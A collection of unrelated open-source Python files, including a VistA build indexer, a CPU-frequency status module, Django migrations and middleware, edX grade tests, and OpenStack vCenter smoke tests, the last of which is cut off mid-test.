                packageName = buildResult["package_file_link"]["label"].split("/")[1]
                self.__buildAbouts[name]["vse:package_name"] = packageName
                self.__buildAbouts[name]["vse:package"] = buildResult["package_file_link"]["value"]
                self.__buildsByPackageName[packageName] = name
                self.__packages[buildResult["package_file_link"]["value"]] = packageName
            self.__buildAbouts[name]["vse:ien"] = buildResult["uri"]["value"].split("-")[1]
            self.__buildAbouts[name]["vse:status"] = "NEVER_INSTALLED" # overridden below
            if "file" in dr.cnodeFields():
                # catch missing 'file'. TBD: do verify version?
                self.__buildFiles[name] = [cnode for cnode in dr.cnodes("file") if "file" in cnode]
                # turn 1- form into straight file id. Note dd_number is optional
                for fileAbout in self.__buildFiles[name]:
                    fileAbout["vse:file_id"] = fileAbout["file"][2:]
            if "global" in dr.cnodeFields():
                self.__buildGlobals[name] = [cnode for cnode in dr.cnodes("global") if "global" in cnode]
            if "multiple_build" in dr.cnodeFields():
                self.__buildMultiples[name] = [cnode for cnode in dr.cnodes("multiple_build") if "multiple_build" in cnode]
            # TODO: required build for tracing if want to be full Build analysis framework
            if "package_namespace_or_prefix" in dr.cnodeFields():
                pass # may join?
            # Strange structure: entry for all possibilities but only some have data
            if "build_components" in dr.cnodeFields():
                bcs = dr.cnodes("build_components")
                for bc in bcs:
                    if "entries" not in bc:
                        continue
                    if bc["build_component"] == "1-8994":
                        self.__buildRPCs[name] = bc["entries"]
                    if bc["build_component"] == "1-9.8":
                        self.__buildRoutines[name] = bc["entries"]
                    continue
        logging.info("%s: Indexing, cleaning (with caching) %d builds took %s" % (self.vistaLabel, len(self.__buildAbouts), datetime.now()-start))
        # Pass 2: index the Install file (9.7), grouping entries by build name.
        self.__installAbouts = OrderedDict()
        noInstalls = 0
        for i, installResult in enumerate(self.__fmqlCacher.describeFileEntries("9_7", limit=limit, cstop=0)):
            # WV has entries with no status: usually there is a follow on with data
            if "status" not in installResult:
                logging.error("No 'status' in install %s" % installResult["uri"]["value"])
                continue
            ir = FMQLDescribeResult(installResult)
            self.__noSpecificValues += ir.noSpecificValues()
            name = installResult["name"]["value"]
            # Don't show FMQL itself
            if re.match(r'CGFMQL', name):
                continue
            if name not in self.__installAbouts:
                self.__installAbouts[name] = []
            self.__installAbouts[name].append(ir.cstopped(flatten=True))
            noInstalls += 1
        # Finally let's go through these installs (in order), all have status
        # and note various aspects of the build like if still installed, last install
        # time etc.
        self.__buildAboutsInstalled = OrderedDict()
        for name, installInfos in self.__installAbouts.items():
            if name not in self.__buildAbouts:
                continue # TODO: look at this: FOIA GECS*2.0*10 (corrupt FOIA?)
            for installInfo in installInfos:
                if installInfo["status"] == "Install Completed":
                    try:
                        self.__buildAbouts[name]["vse:last_install_effect"] = installInfo["install_complete_time"]
                    except: # TODO: check this further - 0LR*5.2*156 in VAVISTA
                        self.__buildAbouts[name]["vse:last_install_effect"] = installInfo["install_start_time"]
                    self.__buildAbouts[name]["vse:status"] = "INSTALLED"
                    if name in self.__buildAboutsInstalled:
                        del self.__buildAboutsInstalled[name]
                    self.__buildAboutsInstalled[name] = self.__buildAbouts[name]
                elif installInfo["status"] == "De-Installed":
                    # TODO: no obvious field for this.
                    self.__buildAbouts[name]["vse:last_install_effect"] = ""
                    self.__buildAbouts[name]["vse:status"] = "DE_INSTALLED"
                    # Should always be but just in case
                    if name in self.__buildAboutsInstalled:
                        del self.__buildAboutsInstalled[name]
                    else:
                        logging.error("De-installing an uninstalled build: %s" % installInfo["uri"])
        logging.info("%s: Indexing, cleaning (with caching) %d builds, %d installs took %s" % (self.vistaLabel, len(self.__buildAbouts), noInstalls, datetime.now()-start))
# ######################## Module Demo ##########################
def demo():
    """
    Simple Demo of this Module
    Equivalent from command line:
    $ python
    ...
    >>> from copies.fmqlCacher import FMQLCacher
    """
    # NOTE: hits the public Caregraf demo VistA over HTTP, so this needs
    # network access and can take a while on a first (uncached) run.
    logging.basicConfig(level=logging.INFO, format="%(message)s")
    from copies.fmqlCacher import FMQLCacher
    cacher = FMQLCacher("Caches")
    cacher.setVista("CGVISTA", fmqlEP="http://vista.caregraf.org/fmqlEP")
    cgbs = VistaBuilds("CGVISTA", cacher)
    buildNames = cgbs.listBuilds()
    packageNames = cgbs.listPackages()
    print packageNames
    print len(packageNames)
    print len(buildNames)
    print len(cgbs.listBuilds(False))
    print "First build is: %s" % buildNames[0]
    # Dump every installed build with its owning package (when known).
    for i, buildName in enumerate(cgbs.listBuilds(True), 1):
        ba = cgbs.describeBuild(buildName)
        print "%d: %s - %s" % (i, buildName, ba["vse:package_name"] if "vse:package_name" in ba else "")
    flsEffected = cgbs.getFiles()
    for i, (fid, fi) in enumerate(flsEffected.items(), 1):
        print "%d: %s - %s" % (i, fid, str(fi))
    print len(list(flsEffected))
    print "Number of specific values available: %d" % cgbs.getNoSpecificValues()
# Run the demo when this module is executed directly.
if __name__ == "__main__":
    demo()
| VAchris/VOLDEMORT | vdm/vistaBuilds.py | Python | apache-2.0 | 15,337 |
from i3pystatus import IntervalModule
class CpuFreq(IntervalModule):
    """
    Shows CPU frequencies, read by default from `/proc/cpuinfo`.

    .. rubric:: Available formatters

    * `{avg}` - mean from all cores in MHz `4.3f`
    * `{avgg}` - mean from all cores in GHz `1.2f`
    * `{coreX}` - frequency of core number `X` in MHz (format `4.3f`), where 0 <= `X` <= number of cores - 1
    * `{coreXg}` - frequency of core number `X` in GHz (format `1.2f`), where 0 <= `X` <= number of cores - 1
    """
    format = "{avgg}"
    settings = (
        "format",
        ("color", "The text color"),
        ("file", "override default path"),
    )
    file = '/proc/cpuinfo'
    color = '#FFFFFF'

    def createvaluesdict(self):
        """
        Parse ``self.file`` (``/proc/cpuinfo`` format) and build the
        formatter dictionary described in the class docstring.

        :return: dict mapping formatter names to pre-formatted strings
        """
        with open(self.file) as f:
            # One "cpu MHz : <value>" line per logical core.
            mhz_values = [float(line.split(':')[1]) for line in f if line.startswith('cpu MHz')]
            ghz_values = [value / 1000.0 for value in mhz_values]
        mhz = {"core{}".format(key): "{0:4.3f}".format(value) for key, value in enumerate(mhz_values)}
        ghz = {"core{}g".format(key): "{0:1.2f}".format(value) for key, value in enumerate(ghz_values)}
        cdict = mhz.copy()
        cdict.update(ghz)
        cdict['avg'] = "{0:4.3f}".format(sum(mhz_values) / len(mhz_values))
        # BUG FIX: the original passed a stray second argument to format()
        # here (a leftover round() parameter); it was silently ignored, so
        # dropping it does not change the output.
        cdict['avgg'] = "{0:1.2f}".format(sum(ghz_values) / len(ghz_values))
        return cdict

    def run(self):
        # Called periodically by IntervalModule; publishes the i3bar segment.
        cdict = self.createvaluesdict()
        self.data = cdict
        self.output = {
            "full_text": self.format.format(**cdict),
            "color": self.color,
            "format": self.format,
        }
| ncoop/i3pystatus | i3pystatus/cpu_freq.py | Python | mit | 1,779 |
# Below is the interface for Iterator, which is already defined for you.
#
# class Iterator(object):
# def __init__(self, nums):
# """
# Initializes an iterator object to the beginning of a list.
# :type nums: List[int]
# """
#
# def hasNext(self):
# """
# Returns true if the iteration has more elements.
# :rtype: bool
# """
#
# def next(self):
# """
# Returns the next element in the iteration.
# :rtype: int
# """
class PeekingIterator(object):
    """Wrap a plain ``Iterator`` so the upcoming element can be inspected
    with ``peek()`` without consuming it.

    A one-element buffer (``nextEle`` guarded by ``peeked``) holds a value
    pulled ahead of time until the following ``next()`` hands it out.
    """
    def __init__(self, iterator):
        """
        Initialize the wrapper around *iterator*.
        :type iterator: Iterator
        """
        self.iterator = iterator
        self.peeked = False
        self.nextEle = None

    def peek(self):
        """
        Returns the next element in the iteration without advancing the iterator.
        :rtype: int
        """
        if self.peeked:
            return self.nextEle
        self.nextEle = self.iterator.next()
        self.peeked = True
        return self.nextEle

    def next(self):
        """
        Returns the next element, draining the peek buffer first.
        :rtype: int
        """
        if self.peeked:
            self.peeked = False
        else:
            self.nextEle = self.iterator.next()
        return self.nextEle

    def hasNext(self):
        """
        Returns true if the iteration has more elements.
        :rtype: bool
        """
        return self.iterator.hasNext() or self.peeked
# Your PeekingIterator object will be instantiated and called as such:
# iter = PeekingIterator(Iterator(nums))
# while iter.hasNext():
# val = iter.peek() # Get the next element but not advance the iterator.
# iter.next() # Should return the same value as [val].
| Jacy-Wang/MyLeetCode | PeekingIterator284.py | Python | gpl-2.0 | 1,718 |
# Generated by Django 2.0.8 on 2019-03-29 19:58
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import simple_history.models
class Migration(migrations.Migration):
    """Auto-generated migration: creates the ``HistoricalArquivoComponente2``
    audit table used by django-simple-history to version ArquivoComponente2
    rows (one historical row per change, keyed by ``history_id``)."""
    dependencies = [
        ('gestao', '0009_historicaldiligenciasimples'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('planotrabalho', '0027_auto_20190329_1650'),
    ]
    operations = [
        migrations.CreateModel(
            name='HistoricalArquivoComponente2',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('arquivo', models.TextField(blank=True, max_length=100, null=True)),
                ('situacao', models.IntegerField(choices=[(0, 'Em preenchimento'), (1, 'Avaliando anexo'), (2, 'Concluída'), (3, 'Arquivo aprovado com ressalvas'), (4, 'Arquivo danificado'), (5, 'Arquivo incompleto'), (6, 'Arquivo incorreto')], default=0, verbose_name='Situação do Arquivo')),
                ('data_envio', models.DateField(default=datetime.date.today)),
                ('data_publicacao', models.DateField(blank=True, null=True, verbose_name='Data de Publicação do Arquivo do Componente')),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('diligencia', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='gestao.DiligenciaSimples')),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical arquivo componente2',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
            bases=(simple_history.models.HistoricalChanges, models.Model),
        ),
    ]
| culturagovbr/sistema-nacional-cultura | planotrabalho/migrations/0028_historicalarquivocomponente2.py | Python | agpl-3.0 | 2,312 |
"""
WSGI config for arcane project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings module before the app is built.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "arcane.settings")
# Module-level WSGI callable that servers (gunicorn, mod_wsgi, ...) look up.
application = get_wsgi_application()
| ArcaneStreaming/Arcane-Server | arcane/wsgi.py | Python | gpl-3.0 | 390 |
"""
Tests of the SubsectionGrade classes.
"""
from ..models import PersistentSubsectionGrade
from ..subsection_grade import CreateSubsectionGrade, ReadSubsectionGrade
from .base import GradeTestBase
from .utils import mock_get_score
class SubsectionGradeTest(GradeTestBase):
    """
    Round-trip tests for CreateSubsectionGrade / ReadSubsectionGrade through
    the PersistentSubsectionGrade model.
    """
    def test_create_and_read(self):
        # mock_get_score(1, 2) => every problem scores 1 out of 2 => 50%.
        with mock_get_score(1, 2):
            # Create a grade that *isn't* saved to the database
            created_grade = CreateSubsectionGrade(
                self.sequence,
                self.course_structure,
                self.subsection_grade_factory._submissions_scores,
                self.subsection_grade_factory._csm_scores,
            )
            self.assertEqual(PersistentSubsectionGrade.objects.count(), 0)
            self.assertEqual(created_grade.percent_graded, 0.5)
            # save to db, and verify object is in database
            created_grade.update_or_create_model(self.request.user)
            self.assertEqual(PersistentSubsectionGrade.objects.count(), 1)
            # read from db, and ensure output matches input
            saved_model = PersistentSubsectionGrade.read_grade(
                user_id=self.request.user.id,
                usage_key=self.sequence.location,
            )
            read_grade = ReadSubsectionGrade(
                self.sequence,
                saved_model,
                self.subsection_grade_factory
            )
            self.assertEqual(created_grade.url_name, read_grade.url_name)
            # first_attempted timestamps differ between create/read paths;
            # zero them out so the aggregate comparison below is meaningful.
            read_grade.all_total.first_attempted = created_grade.all_total.first_attempted = None
            self.assertEqual(created_grade.all_total, read_grade.all_total)
            self.assertEqual(created_grade.percent_graded, 0.5)
    def test_zero(self):
        # Zero possible points must yield 0% rather than a division error.
        with mock_get_score(1, 0):
            grade = CreateSubsectionGrade(
                self.sequence,
                self.course_structure,
                self.subsection_grade_factory._submissions_scores,
                self.subsection_grade_factory._csm_scores,
            )
            self.assertEqual(grade.percent_graded, 0.0)
| edx-solutions/edx-platform | lms/djangoapps/grades/tests/test_subsection_grade.py | Python | agpl-3.0 | 2,100 |
#!flask/bin/python
from app import create_app
# Build the Flask application via the factory; serve it only when this file
# is executed directly (WSGI servers import `app` instead of running it).
app = create_app()
if __name__ == "__main__":
    app.run()
| NikhilKalige/atom-website | run.py | Python | bsd-2-clause | 108 |
"""
Simple utilities.
"""
### IMPORTS
from werkzeug.contrib.cache import SimpleCache
from egas import app, db
from . import models
#__all__ = (
# 'simple_repr',
#)
### CONSTANTS & DEFINES
CACHE = SimpleCache()
CACHE_TIMEOUT = 5 * 60 # 5 minutes
### CODE ###
def simple_repr (obj, *fields):
    """
    Build a cheap, readable repr for *obj* from the named *fields*.

    Produces ``ClassName (field1: value1, field2: value2)``.
    """
    parts = []
    for f in fields:
        parts.append ('%s: %s' % (f, getattr (obj, f)))
    return '%s (%s)' % (obj.__class__.__name__, ', '.join (parts))
@app.context_processor
def utility_processor():
    """
    Make utility helpers available inside all Jinja templates.
    """
    # BUG FIX: ``date_now`` uses the datetime module, which this file never
    # imported (calling it raised NameError); import it locally here.
    import datetime

    def date_now(format="%d.%m.%Y %H:%M:%S"):
        """Return the current local time formatted with *format*.

        BUG FIX: the original default was ``"%d.m.%Y ..."`` -- the missing
        ``%`` before ``m`` printed a literal ``m`` instead of the month.
        """
        return datetime.datetime.now().strftime (format)

    def get_total_associations():
        """
        Total number of Association records, cached for CACHE_TIMEOUT.
        """
        val = CACHE.get ('total_associations')
        if val is None:
            val = db.session.query (models.Association).count()
            CACHE.set ('total_associations', val, timeout=CACHE_TIMEOUT)
        return val

    def get_latest_news():
        """
        Summary dict for the most recent News item (or None), cached.
        """
        val = CACHE.get ('latest_news')
        if val is None:
            val = db.session.query (models.News).order_by (models.News.created_on.desc()).first()
            if val:
                val = {
                    'id': val.id,
                    'title': val.title,
                    'created_on': val.created_on,
                }
            CACHE.set ('latest_news', val, timeout=CACHE_TIMEOUT)
        return val

    def get_model_json (pk):
        """
        Summary dict for the most recent News item (or None).

        NOTE(review): despite the name and signature, *pk* is ignored and
        the newest News record is always returned -- confirm the intended
        behaviour before relying on this helper.
        """
        val = db.session.query (models.News).order_by (models.News.created_on.desc()).first()
        if val:
            val = {
                'id': val.id,
                'title': val.title,
                'created_on': val.created_on,
            }
        return val

    return dict (
        date_now=date_now,
        get_total_associations=get_total_associations,
        get_latest_news=get_latest_news,
        get_model_json=get_model_json,
    )
# Expose the full template context and the builtin ``callable`` to Jinja
# templates (handy for debugging and duck-typing checks in templates).
import jinja2
@jinja2.contextfunction
def get_context(c):
    """Return the calling template's context object unchanged."""
    return c
app.jinja_env.globals['context'] = get_context
app.jinja_env.globals['callable'] = callable
### END ###
| agapow/egas | egas/utils.py | Python | mit | 2,353 |
from django.http import HttpResponseBadRequest, HttpResponse
from .models import Device
class DeviceVerificationMiddleware(object):
    """Django middleware that authenticates requests signed by a Device.

    When the ``X-Device-Verification`` header is present, the request must
    also carry ``X-Device`` (the device primary key) and the named device
    must verify the request signature.  On success the ``Device`` instance
    is attached as ``request.device``; on failure a 4xx response is
    returned.  Unsigned requests pass through with ``request.device = None``.
    """
    def __init__(self, get_response=None):
        self.get_response = get_response

    def __call__(self, request):
        request.device = None
        if "HTTP_X_DEVICE_VERIFICATION" in request.META:
            if "HTTP_X_DEVICE" not in request.META:
                return HttpResponseBadRequest("No device_id specified.")
            device_id = request.META["HTTP_X_DEVICE"]
            try:
                device = Device.objects.get(pk=device_id)
            except Device.DoesNotExist:
                # BUG FIX: an unknown device id used to raise DoesNotExist
                # and produce a 500; treat it like a failed verification.
                return HttpResponse("Device unverifiable.", status=401)
            if not device.verify_request(
                    request, request.META["HTTP_X_DEVICE_VERIFICATION"]):
                return HttpResponse("Device unverifiable.", status=401)
            request.device = device
        return self.get_response(request)
| LazyHaus/API | api/middleware.py | Python | gpl-3.0 | 899 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2015 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import traceback
from fuel_health.common.utils.data_utils import rand_name
from fuel_health import nmanager
from fuel_health import test
LOG = logging.getLogger(__name__)
class TestVcenter(nmanager.NovaNetworkScenarioTest):
    """Test suit verifies:
    - Instance creation
    - Floating ip creation
    - Instance connectivity by floating IP
    """
    @classmethod
    def setUpClass(cls):
        super(TestVcenter, cls).setUpClass()
        if cls.manager.clients_initialized:
            # Resolve the admin tenant id once; tests key their per-tenant
            # resources (e.g. security groups) off it.
            cls.tenant_id = cls.manager._get_identity_client(
                cls.config.identity.admin_username,
                cls.config.identity.admin_password,
                cls.config.identity.admin_tenant_name).tenant_id
            cls.keypairs = {}
            cls.security_groups = {}
            cls.network = []
            cls.servers = []
            cls.floating_ips = []
    def setUp(self):
        super(TestVcenter, self).setUp()
        self.check_clients_state()
    def tearDown(self):
        super(TestVcenter, self).tearDown()
        if self.manager.clients_initialized:
            if self.servers:
                # Best-effort cleanup: a server may already be gone if the
                # test deleted it itself.
                for server in self.servers:
                    try:
                        self._delete_server(server)
                        self.servers.remove(server)
                    except Exception:
                        LOG.debug(traceback.format_exc())
                        LOG.debug("Server was already deleted.")
    def test_1_vcenter_create_servers(self):
        """vCenter: Launch instance
        Target component: Nova
        Scenario:
            1. Create a new security group (if it doesn`t exist yet).
            2. Create an instance using the new security group.
            3. Delete instance.
        Duration: 200 s.
        Available since release: 2014.2-6.1
        Deployment tags: use_vcenter
        """
        self.check_image_exists()
        if not self.security_groups:
            self.security_groups[self.tenant_id] = self.verify(
                25,
                self._create_security_group,
                1,
                "Security group can not be created.",
                'security group creation',
                self.compute_client)
        name = rand_name('ost1_test-server-smoke-')
        security_groups = [self.security_groups[self.tenant_id].name]
        img_name = 'TestVM-VMDK'
        server = self.verify(
            200,
            self._create_server,
            2,
            "Creating instance using the new security group has failed.",
            'image creation',
            self.compute_client, name, security_groups, None, None, img_name
        )
        self.verify(30, self._delete_server, 3,
                    "Server can not be deleted.",
                    "server deletion", server)
    def test_3_vcenter_check_public_instance_connectivity_from_instance(self):
        """vCenter: Check network connectivity from instance via floating IP
        Target component: Nova
        Scenario:
            1. Create a new security group (if it doesn`t exist yet).
            2. Create an instance using the new security group.
            3. Create a new floating IP
            4. Assign the new floating IP to the instance.
            5. Check connectivity to the floating IP using ping command.
            6. Check that public IP 8.8.8.8 can be pinged from instance.
            7. Disassociate server floating ip.
            8. Delete floating ip
            9. Delete server.
        Duration: 300 s.
        Available since release: 2014.2-6.1
        Deployment tags: nova_network, use_vcenter
        """
        self.check_image_exists()
        if not self.security_groups:
            self.security_groups[self.tenant_id] = self.verify(
                25, self._create_security_group, 1,
                "Security group can not be created.",
                'security group creation',
                self.compute_client)
        name = rand_name('ost1_test-server-smoke-')
        security_groups = [self.security_groups[self.tenant_id].name]
        img_name = 'TestVM-VMDK'
        server = self.verify(250, self._create_server, 2,
                             "Server can not be created.",
                             "server creation",
                             self.compute_client, name, security_groups, None,
                             None, img_name)
        floating_ip = self.verify(
            20,
            self._create_floating_ip,
            3,
            "Floating IP can not be created.",
            'floating IP creation')
        self.verify(20, self._assign_floating_ip_to_instance,
                    4, "Floating IP can not be assigned.",
                    'floating IP assignment',
                    self.compute_client, server, floating_ip)
        self.floating_ips.append(floating_ip)
        ip_address = floating_ip.ip
        # Fixed log typo ('is address is' -> 'ip address is').
        LOG.info('ip address is {0}'.format(ip_address))
        LOG.debug(ip_address)
        self.verify(600, self._check_vm_connectivity, 5,
                    "VM connectivity doesn`t function properly.",
                    'VM connectivity checking', ip_address,
                    30, (6, 60))
        self.verify(600, self._check_connectivity_from_vm,
                    6, ("Connectivity to 8.8.8.8 from the VM doesn`t "
                        "function properly."),
                    'public connectivity checking from VM', ip_address,
                    30, (6, 60))
        self.verify(10, self.compute_client.servers.remove_floating_ip,
                    7, "Floating IP cannot be removed.",
                    "removing floating IP", server, floating_ip)
        self.verify(10, self.compute_client.floating_ips.delete,
                    8, "Floating IP cannot be deleted.",
                    "floating IP deletion", floating_ip)
        if self.floating_ips:
            self.floating_ips.remove(floating_ip)
        self.verify(30, self._delete_server, 9,
                    "Server can not be deleted. ",
                    "server deletion", server)
    def test_2_vcenter_check_internet_connectivity_without_floatingIP(self):
        """vCenter: Check network connectivity from instance without floating \
        IP
        Target component: Nova
        Scenario:
            1. Create a new security group (if it doesn`t exist yet).
            2. Create an instance using the new security group.
            (if it doesn`t exist yet).
            3. Check that public IP 8.8.8.8 can be pinged from instance.
            4. Delete server.
        Duration: 300 s.
        Available since release: 2014.2-6.1
        Deployment tags: nova_network, use_vcenter
        """
        self.check_image_exists()
        if not self.security_groups:
            self.security_groups[self.tenant_id] = self.verify(
                25, self._create_security_group, 1,
                "Security group can not be created.",
                'security group creation', self.compute_client)
        name = rand_name('ost1_test-server-smoke-')
        security_groups = [self.security_groups[self.tenant_id].name]
        img_name = 'TestVM-VMDK'
        compute = None
        server = self.verify(
            250, self._create_server, 2,
            "Server can not be created.",
            'server creation',
            self.compute_client, name, security_groups, None, None, img_name)
        # Fix: ``instance_ip`` was previously left unbound when no
        # 'novanetwork*' address was present, which crashed with NameError
        # instead of a clear test failure.
        instance_ip = None
        try:
            for addr in server.addresses:
                if addr.startswith('novanetwork'):
                    instance_ip = server.addresses[addr][0]['addr']
        except Exception:
            LOG.debug(traceback.format_exc())
        if instance_ip is None:
            self.fail("Step 3 failed: cannot get instance details. "
                      "Please refer to OpenStack logs for more details.")
        self.verify(400, self._check_connectivity_from_vm,
                    3, ("Connectivity to 8.8.8.8 from the VM doesn`t "
                        "function properly."),
                    'public connectivity checking from VM',
                    instance_ip, 30, (6, 30), compute)
        self.verify(30, self._delete_server, 4,
                    "Server can not be deleted. ",
                    "server deletion", server)
class TestVcenterImageAction(nmanager.SmokeChecksTest):
    """Test class verifies the following:
      - verify that image can be created;
      - verify that instance can be booted from created image;
      - verify that snapshot can be created from an instance;
      - verify that instance can be booted from a snapshot.
    """
    @classmethod
    def setUpClass(cls):
        super(TestVcenterImageAction, cls).setUpClass()
        if cls.manager.clients_initialized:
            cls.micro_flavors = cls.find_micro_flavor()
    @classmethod
    def tearDownClass(cls):
        super(TestVcenterImageAction, cls).tearDownClass()
    def setUp(self):
        super(TestVcenterImageAction, self).setUp()
        self.check_clients_state()
        self.check_image_exists()
    def _wait_for_server_status(self, server, status):
        """Block until the server reaches ``status`` (or time out)."""
        self.status_timeout(self.compute_client.servers,
                            server.id,
                            status)
    def _wait_for_image_status(self, image_id, status):
        """Block until the image reaches ``status`` (or time out)."""
        self.status_timeout(self.compute_client.images, image_id, status)
    def _wait_for_server_deletion(self, server):
        """Poll until the server can no longer be retrieved."""
        def is_deletion_complete():
            # Deletion testing is only required for objects whose
            # existence cannot be checked via retrieval.
            if isinstance(server, dict):
                return True
            try:
                server.get()
            except Exception as e:
                # Clients are expected to return an exception
                # called 'NotFound' if retrieval fails.
                if e.__class__.__name__ == 'NotFound':
                    return True
                self.error_msg.append(e)
                LOG.debug(traceback.format_exc())
            return False
        # Block until resource deletion has completed or timed-out
        test.call_until_true(is_deletion_complete, 10, 1)
    def _boot_image(self, image_id):
        """Boot a server from ``image_id`` and wait until it is ACTIVE."""
        if not self.micro_flavors:
            self.fail("Flavor for tests was not found. Seems that "
                      "something is wrong with nova services.")
        name = rand_name('ost1_test-image')
        client = self.compute_client
        LOG.debug("name:%s, image:%s" % (name, image_id))
        if 'neutron' in self.config.network.network_provider:
            # With Neutron the NIC must be attached to the default private
            # network explicitly.
            network = [net.id for net in
                       self.compute_client.networks.list()
                       if net.label == self.private_net]
            if network:
                create_kwargs = {
                    'nics': [
                        {'net-id': network[0]},
                    ],
                }
            else:
                self.fail("Default private network '{0}' isn't present. "
                          "Please verify it is properly created.".
                          format(self.private_net))
            server = client.servers.create(name=name,
                                           image=image_id,
                                           flavor=self.micro_flavors[0],
                                           **create_kwargs)
        else:
            server = client.servers.create(name=name,
                                           image=image_id,
                                           flavor=self.micro_flavors[0])
        self.set_resource(name, server)
        # self.addCleanup(self.compute_client.servers.delete, server)
        self.verify_response_body_content(
            name, server.name,
            msg="Please refer to OpenStack logs for more details.")
        self._wait_for_server_status(server, 'ACTIVE')
        server = client.servers.get(server)  # getting network information
        LOG.debug("server:%s" % server)
        return server
    def _create_image(self, server):
        """Snapshot ``server`` into a Glance image and return its id."""
        snapshot_name = rand_name('ost1_test-snapshot-')
        create_image_client = self.compute_client.servers.create_image
        image_id = create_image_client(server, snapshot_name)
        self.addCleanup(self.compute_client.images.delete, image_id)
        self._wait_for_server_status(server, 'ACTIVE')
        self._wait_for_image_status(image_id, 'ACTIVE')
        snapshot_image = self.compute_client.images.get(image_id)
        self.verify_response_body_content(
            snapshot_name, snapshot_image.name,
            msg="Please refer to OpenStack logs for more details.")
        return image_id
    def test_4_snapshot(self):
        """vCenter: Launch instance, create snapshot, launch instance from \
        snapshot
        Target component: Glance
        Scenario:
            1. Get existing image by name.
            2. Launch an instance using the default image.
            3. Make snapshot of the created instance.
            4. Delete the instance created in step 2.
            5. Wait while instance deleted
            6. Launch another instance from the snapshot created in step 3.
            7. Delete server.
        Duration: 300 s.
        Available since release: 2014.2-6.1
        Deployment tags: nova_network, use_vcenter
        """
        img_name = 'TestVM-VMDK'
        image = self.verify(30, self.get_image_from_name, 1,
                            "Image can not be retrieved.",
                            "getting image by name",
                            img_name)
        server = self.verify(180, self._boot_image, 2,
                             "Image can not be booted.",
                             "image booting",
                             image)
        # snapshot the instance
        snapshot_image_id = self.verify(700, self._create_image, 3,
                                        "Snapshot of an"
                                        " instance can not be created.",
                                        'snapshotting an instance',
                                        server)
        self.verify(180, self.compute_client.servers.delete, 4,
                    "Instance can not be deleted.",
                    'Instance deletion',
                    server)
        self.verify(180, self._wait_for_server_deletion, 5,
                    "Instance can not be deleted.",
                    'Wait for instance deletion complete',
                    server)
        server = self.verify(700, self._boot_image, 6,
                             "Instance can not be launched from snapshot.",
                             'booting instance from snapshot',
                             snapshot_image_id)
        self.verify(30, self._delete_server, 7,
                    "Server can not be deleted.",
                    "server deletion", server)
class VcenterVolumesTest(nmanager.SmokeChecksTest):
    """Smoke test: Cinder volume lifecycle against a vCenter backend."""
    @classmethod
    def setUpClass(cls):
        super(VcenterVolumesTest, cls).setUpClass()
        if cls.manager.clients_initialized:
            cls.micro_flavors = cls.find_micro_flavor()
    def setUp(self):
        super(VcenterVolumesTest, self).setUp()
        self.check_clients_state()
        # The whole class is only meaningful with a cinder-vmware node.
        if (not self.config.volume.cinder_vmware_node_exist):
            self.skipTest('There are no cinder-vmware nodes')
        self.check_image_exists()
    @classmethod
    def tearDownClass(cls):
        super(VcenterVolumesTest, cls).tearDownClass()
    def _wait_for_volume_status(self, volume, status):
        """Block until the volume reaches ``status`` (or time out)."""
        self.status_timeout(self.volume_client.volumes, volume.id, status)
    def _wait_for_instance_status(self, server, status):
        """Block until the server reaches ``status`` (or time out)."""
        self.status_timeout(self.compute_client.servers, server.id, status)
    def test_5_vcenter_volume_create(self):
        """vCenter: Create volume and attach it to instance
        Target component: Compute
        Scenario:
            1. Create a new small-size volume.
            2. Wait for volume status to become "available".
            3. Check volume has correct name.
            4. Create new instance.
            5. Wait for "Active" status
            6. Attach volume to an instance.
            7. Check volume status is "in use".
            8. Get information on the created volume by its id.
            9. Detach volume from the instance.
            10. Check volume has "available" status.
            11. Delete volume.
            12. Verify that volume deleted
            13. Delete server.
        Duration: 350 s.
        Available since release: 2014.2-6.1
        Deployment tags: nova_network, use_vcenter
        """
        msg_s1 = 'Volume was not created.'
        img_name = 'TestVM-VMDK'
        az = self.config.volume.cinder_vmware_storage_az
        # Create volume
        volume = self.verify(120, self._create_volume, 1,
                             msg_s1,
                             "volume creation",
                             self.volume_client, None, availability_zone=az)
        self.verify(200, self._wait_for_volume_status, 2,
                    msg_s1,
                    "volume becoming 'available'",
                    volume, 'available')
        self.verify_response_true(
            volume.display_name.startswith('ostf-test-volume'),
            'Step 3 failed: {msg}'.format(msg=msg_s1))
        # create instance
        instance = self.verify(200, self._create_server, 4,
                               "Instance creation failed. ",
                               "server creation",
                               self.compute_client, img_name)
        self.verify(200, self._wait_for_instance_status, 5,
                    'Instance status did not become "available".',
                    "instance becoming 'available'",
                    instance, 'ACTIVE')
        # Attach volume
        self.verify(120, self._attach_volume_to_instance, 6,
                    'Volume couldn`t be attached.',
                    'volume attachment',
                    volume, instance.id)
        self.verify(180, self._wait_for_volume_status, 7,
                    'Attached volume status did not become "in-use".',
                    "volume becoming 'in-use'",
                    volume, 'in-use')
        # get volume details
        self.verify(20, self.volume_client.volumes.get, 8,
                    "Can not retrieve volume details. ",
                    "retrieving volume details", volume.id)
        # detach volume
        self.verify(50, self._detach_volume, 9,
                    'Can not detach volume. ',
